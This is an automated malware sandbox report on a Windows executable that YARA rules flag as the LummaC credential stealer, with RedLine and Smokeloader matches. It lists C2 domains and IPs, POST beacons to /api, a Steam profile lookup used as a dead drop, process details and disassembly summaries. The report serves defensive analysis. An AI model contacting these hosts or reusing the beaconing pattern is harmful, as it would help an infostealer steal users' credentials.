                                                                                                                                                                                                                                                Dec 17, 2024 08:14:13.923619986 CET53583491.1.1.1192.168.2.7
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:13.927521944 CET5425353192.168.2.71.1.1.1
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:14.065850973 CET53542531.1.1.1192.168.2.7
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:14.069775105 CET5970653192.168.2.71.1.1.1
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:14.207386017 CET53597061.1.1.1192.168.2.7
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:14.211092949 CET6544253192.168.2.71.1.1.1
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:14.349394083 CET53654421.1.1.1192.168.2.7
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:14.354173899 CET5750653192.168.2.71.1.1.1
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:14.493525028 CET53575061.1.1.1192.168.2.7
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:14.495620966 CET5743753192.168.2.71.1.1.1
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:14.719619989 CET53574371.1.1.1192.168.2.7

                                                                                                                                                                                                                                                DNS Queries

                                                                                                                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:08.724565983 CET192.168.2.71.1.1.10x9faeStandard query (0)sordid-snaked.cyouA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:08.865339994 CET192.168.2.71.1.1.10xdc52Standard query (0)immureprech.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:11.794066906 CET192.168.2.71.1.1.10x5b43Standard query (0)deafeninggeh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:13.598640919 CET192.168.2.71.1.1.10xf47aStandard query (0)effecterectz.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:13.785650015 CET192.168.2.71.1.1.10xa296Standard query (0)diffuculttan.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:13.927521944 CET192.168.2.71.1.1.10xd6b8Standard query (0)debonairnukk.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:14.069775105 CET192.168.2.71.1.1.10xdfd7Standard query (0)wrathful-jammy.cyouA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:14.211092949 CET192.168.2.71.1.1.10x7f20Standard query (0)awake-weaves.cyouA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:14.354173899 CET192.168.2.71.1.1.10xcd8eStandard query (0)sordid-snaked.cyouA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:14.495620966 CET192.168.2.71.1.1.10xd358Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                DNS Answers

                                                                                                                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:08.862202883 CET1.1.1.1192.168.2.70x9faeName error (3)sordid-snaked.cyounonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:09.003070116 CET1.1.1.1192.168.2.70xdc52No error (0)immureprech.biz45.77.249.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:09.003070116 CET1.1.1.1192.168.2.70xdc52No error (0)immureprech.biz178.62.201.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:09.003070116 CET1.1.1.1192.168.2.70xdc52No error (0)immureprech.biz104.131.68.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:11.932040930 CET1.1.1.1192.168.2.70x5b43No error (0)deafeninggeh.biz104.131.68.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:11.932040930 CET1.1.1.1192.168.2.70x5b43No error (0)deafeninggeh.biz178.62.201.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:11.932040930 CET1.1.1.1192.168.2.70x5b43No error (0)deafeninggeh.biz45.77.249.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:13.736835957 CET1.1.1.1192.168.2.70xf47aName error (3)effecterectz.xyznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:13.923619986 CET1.1.1.1192.168.2.70xa296Name error (3)diffuculttan.xyznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:14.065850973 CET1.1.1.1192.168.2.70xd6b8Name error (3)debonairnukk.xyznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:14.207386017 CET1.1.1.1192.168.2.70xdfd7Name error (3)wrathful-jammy.cyounonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:14.349394083 CET1.1.1.1192.168.2.70x7f20Name error (3)awake-weaves.cyounonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:14.493525028 CET1.1.1.1192.168.2.70xcd8eName error (3)sordid-snaked.cyounonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:14.719619989 CET1.1.1.1192.168.2.70xd358No error (0)steamcommunity.com104.121.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:43.387614012 CET1.1.1.1192.168.2.70xcc73No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:43.387614012 CET1.1.1.1192.168.2.70xcc73No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 17, 2024 08:15:07.855595112 CET1.1.1.1192.168.2.70x154cNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 17, 2024 08:15:07.855595112 CET1.1.1.1192.168.2.70x154cNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                                                                                                                                • immureprech.biz
                                                                                                                                                                                                                                                • deafeninggeh.biz
                                                                                                                                                                                                                                                • steamcommunity.com

                                                                                                                                                                                                                                                HTTPS Proxied Packets

                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                0192.168.2.74969945.77.249.794434692C:\Users\user\Desktop\SkaKk8Z1J0.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-17 07:14:10 UTC262OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                Content-Length: 8
                                                                                                                                                                                                                                                Host: immureprech.biz
                                                                                                                                                                                                                                                2024-12-17 07:14:10 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                Data Ascii: act=life
                                                                                                                                                                                                                                                2024-12-17 07:14:11 UTC94INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Tue, 17 Dec 2024 07:14:11 GMT
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Connection: close


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                1192.168.2.749700104.131.68.1804434692C:\Users\user\Desktop\SkaKk8Z1J0.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-17 07:14:13 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                Content-Length: 8
                                                                                                                                                                                                                                                Host: deafeninggeh.biz
                                                                                                                                                                                                                                                2024-12-17 07:14:13 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                Data Ascii: act=life
                                                                                                                                                                                                                                                2024-12-17 07:14:13 UTC94INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Tue, 17 Dec 2024 07:14:13 GMT
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Connection: close


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                2192.168.2.749701104.121.10.344434692C:\Users\user\Desktop\SkaKk8Z1J0.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-17 07:14:16 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                Host: steamcommunity.com
                                                                                                                                                                                                                                                2024-12-17 07:14:16 UTC1905INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                                                                Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Date: Tue, 17 Dec 2024 07:14:16 GMT
                                                                                                                                                                                                                                                Content-Length: 35131
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Set-Cookie: sessionid=825c38163a92c456e2df3c52; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                                Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                2024-12-17 07:14:16 UTC14479INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
                                                                                                                                                                                                                                                2024-12-17 07:14:17 UTC16384INData Raw: 6d 75 6e 69 74 79 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55
                                                                                                                                                                                                                                                Data Ascii: munity.com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SU
                                                                                                                                                                                                                                                2024-12-17 07:14:17 UTC3768INData Raw: 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 61 63 74 69 6f 6e 73 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 73 75 6d 6d 61 72 79 22 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 20 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 5f 73 70 61 63 65 72 22 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 22 3e 0a 09 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 61 63 74 75 61 6c 5f 70 65 72
                                                                                                                                                                                                                                                Data Ascii: </a></div><div class="profile_header_actions"></div></div><div class="profile_header_summary"><div class="persona_name persona_name_spacer" style="font-size: 24px;"><span class="actual_per
                                                                                                                                                                                                                                                2024-12-17 07:14:17 UTC500INData Raw: 20 53 75 62 73 63 72 69 62 65 72 20 41 67 72 65 65 6d 65 6e 74 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 26 6e 62 73 70 3b 7c 20 26 6e 62 73 70 3b 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 63 63 6f 75 6e 74 2f 63 6f 6f 6b 69 65 70 72 65 66 65 72 65 6e 63 65 73 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6f 6f 6b 69 65 73 3c 2f 61 3e 0a 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 65 73 70 6f 6e 73 69 76 65 5f 6f 70 74 69 6e 5f 6c 69 6e 6b 22 3e 0a 09 09 09 09 3c 64 69 76
                                                                                                                                                                                                                                                Data Ascii: Subscriber Agreement</a> &nbsp;| &nbsp;<a href="http://store.steampowered.com/account/cookiepreferences/" target="_blank">Cookies</a></span></span></div><div class="responsive_optin_link"><div


                                                                                                                                                                                                                                                Statistics

                                                                                                                                                                                                                                                CPU Usage

                                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                                Memory Usage

                                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                                High Level Behavior Distribution

                                                                                                                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                                                                                                                Behavior

                                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                                System Behavior

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Target ID:0
                                                                                                                                                                                                                                                Start time:02:14:07
                                                                                                                                                                                                                                                Start date:17/12/2024
                                                                                                                                                                                                                                                Path:C:\Users\user\Desktop\SkaKk8Z1J0.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                Commandline:"C:\Users\user\Desktop\SkaKk8Z1J0.exe"
                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                File size:334'336 bytes
                                                                                                                                                                                                                                                MD5 hash:6997FF1992058C43F1355563C6A5A7AF
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1724928073.0000000000540000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000003.1261325355.0000000000790000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Target ID:10
                                                                                                                                                                                                                                                Start time:02:14:19
                                                                                                                                                                                                                                                Start date:17/12/2024
                                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4692 -s 1004
                                                                                                                                                                                                                                                Imagebase:0x900000
                                                                                                                                                                                                                                                File size:483'680 bytes
                                                                                                                                                                                                                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Target ID:12
                                                                                                                                                                                                                                                Start time:02:14:20
                                                                                                                                                                                                                                                Start date:17/12/2024
                                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4692 -s 1668
                                                                                                                                                                                                                                                Imagebase:0x900000
                                                                                                                                                                                                                                                File size:483'680 bytes
                                                                                                                                                                                                                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Disassembly

                                                                                                                                                                                                                                                Reset < >

                                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                                  Execution Coverage:1.7%
                                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:42%
                                                                                                                                                                                                                                                  Signature Coverage:43.5%
                                                                                                                                                                                                                                                  Total number of Nodes:69
                                                                                                                                                                                                                                                  Total number of Limit Nodes:3
                                                                                                                                                                                                                                                  execution_graph 26279 74003c 26280 740049 26279->26280 26294 740e0f SetErrorMode SetErrorMode 26280->26294 26285 740265 26286 7402ce VirtualProtect 26285->26286 26288 74030b 26286->26288 26287 740439 VirtualFree 26292 7405f4 LoadLibraryA 26287->26292 26293 7404be 26287->26293 26288->26287 26289 7404e3 LoadLibraryA 26289->26293 26291 7408c7 26292->26291 26293->26289 26293->26292 26295 740223 26294->26295 26296 740d90 26295->26296 26297 740dad 26296->26297 26298 740dbb GetPEB 26297->26298 26299 740238 VirtualAlloc 26297->26299 26298->26299 26299->26285 26300 43b068 26301 43b080 26300->26301 26304 43b16e 26301->26304 26306 43a9b0 LdrInitializeThunk 26301->26306 26303 43b23f 26304->26303 26307 43a9b0 LdrInitializeThunk 26304->26307 26306->26304 26307->26303 26308 40b44c 26312 40b45a 26308->26312 26313 40b57c 26308->26313 26309 40b65c 26311 43a950 2 API calls 26309->26311 26311->26313 26312->26309 26312->26313 26314 43a950 26312->26314 26315 43a995 26314->26315 26316 43a968 26314->26316 26317 43a976 26314->26317 26320 43a98a 26314->26320 26321 438e70 26315->26321 26316->26315 26316->26317 26319 43a97b RtlReAllocateHeap 26317->26319 26319->26320 26320->26309 26322 438e83 26321->26322 26323 438e94 26321->26323 26324 438e88 RtlFreeHeap 26322->26324 26323->26320 26324->26323 26325 43aecc 26327 43af00 26325->26327 26326 43af7e 26327->26326 26329 43a9b0 LdrInitializeThunk 26327->26329 26329->26326 26330 408790 26332 40879f 26330->26332 26331 408970 ExitProcess 26332->26331 26333 4087b4 GetCurrentProcessId GetCurrentThreadId 26332->26333 26336 40887a 26332->26336 26334 4087da 26333->26334 26335 4087de SHGetSpecialFolderPathW GetForegroundWindow 26333->26335 26334->26335 26335->26336 26336->26331 26337 438e51 RtlAllocateHeap 26338 43ab91 26339 43ab9a GetForegroundWindow 26338->26339 26340 43abad 26339->26340 26341 540000 26344 540006 26341->26344 26345 540015 26344->26345 26348 5407a6 26345->26348 26349 5407c1 26348->26349 26350 5407ca CreateToolhelp32Snapshot 26349->26350 26351 5407e6 Module32First 26349->26351 26350->26349 26350->26351 26352 5407f5 26351->26352 26354 540005 26351->26354 26355 540465 26352->26355 26356 540490 26355->26356 26357 5404a1 VirtualAlloc 26356->26357 26358 5404d9 26356->26358 26357->26358 26358->26358 26364 40d8f7 26366 40d910 26364->26366 26365 40d95e 26366->26365 26368 43a9b0 LdrInitializeThunk 26366->26368 26368->26365

                                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                                  Function 00408790 Relevance: 7.6, APIs: 5, Instructions: 146threadCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 004087B4
                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 004087BE
                                                                                                                                                                                                                                                  • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 0040885B
                                                                                                                                                                                                                                                  • GetForegroundWindow.USER32 ref: 00408870
                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 00408972
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 4063528623-0
                                                                                                                                                                                                                                                  • Opcode ID: 7b623bcc5e135466e494fc7f4101763bd35fdd0b5e674fc8217798d0a0a97a45
                                                                                                                                                                                                                                                  • Instruction ID: a67ee57a83d6170df5f07577f929ddf8a699819013d33d30bc43b1fbcecb0360
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7b623bcc5e135466e494fc7f4101763bd35fdd0b5e674fc8217798d0a0a97a45
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 95417E77F443180BD31CBEB59C9A36AB2969BC4314F0A903F6985AB3D1DD7C5C0552C5
                                                                                                                                                                                                                                                  Function 005407A6 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 129 5407a6-5407bf 130 5407c1-5407c3 129->130 131 5407c5 130->131 132 5407ca-5407d6 CreateToolhelp32Snapshot 130->132 131->132 133 5407e6-5407f3 Module32First 132->133 134 5407d8-5407de 132->134 135 5407f5-5407f6 call 540465 133->135 136 5407fc-540804 133->136 134->133 139 5407e0-5407e4 134->139 140 5407fb 135->140 139->130 139->133 140->136
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 005407CE
                                                                                                                                                                                                                                                  • Module32First.KERNEL32(00000000,00000224), ref: 005407EE
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724928073.0000000000540000.00000040.00001000.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_540000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3833638111-0
                                                                                                                                                                                                                                                  • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                                  • Instruction ID: 0cf283d98efe61e3cd9481b54c82bc3f55ec36781a81dceacc3b71ca884935ef
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BBF062311017116BD7203AB5988DAAF7AE8FF89769F201528E742910C0DA74F8454A62
                                                                                                                                                                                                                                                  Function 0040B44C Relevance: 1.6, Strings: 1, Instructions: 345COMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
